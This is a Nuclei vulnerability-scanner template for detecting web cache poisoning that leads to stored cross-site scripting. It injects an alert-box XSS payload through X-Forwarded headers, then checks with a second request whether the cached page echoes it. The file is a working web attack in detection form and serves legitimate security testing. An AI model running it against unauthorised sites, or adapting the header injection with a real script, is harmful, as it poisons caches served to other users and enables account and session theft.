id: cache-poisoning-xss

info:
  name: Cache Poisoning - Stored XSS
  author: melbadry9,xelkomy,akincibor
  severity: high
  reference:
    - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning
    - https://portswigger.net/research/practical-web-cache-poisoning
    - https://portswigger.net/web-security/web-cache-poisoning
  metadata:
    max-request: 2
  tags: cache,generic,xss
variables:
  cache_key: "{{to_lower(rand_base(6))}}"
  cache_header: "{{to_lower(rand_base(6))}}"
  xss_payload: '"></script><script>alert(document.domain);</script>'

http:
  - raw:
      - |
        GET /?{{cache_key}}=1 HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-Prefix: {{cache_header}}.xfp{{xss_payload}}
        X-Forwarded-Host: {{cache_header}}.xfh{{xss_payload}}
        X-Forwarded-For: {{cache_header}}.xff{{xss_payload}}
      - |
        GET /?{{cache_key}}=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains(body_2, cache_header)
          - contains(body_2, xss_payload)
        condition: and

# digest: 4b0a00483046022100c1ba6ad4b9512dfab82b31a8c463c89b098f22a9e21a6a30acb9c693d16010050221009e2b6506dd963a8f45a268fb98f1c55502dfab129055fed4d863b2bfe95a00a8:922c64590222798bb761d5b6d8e72950
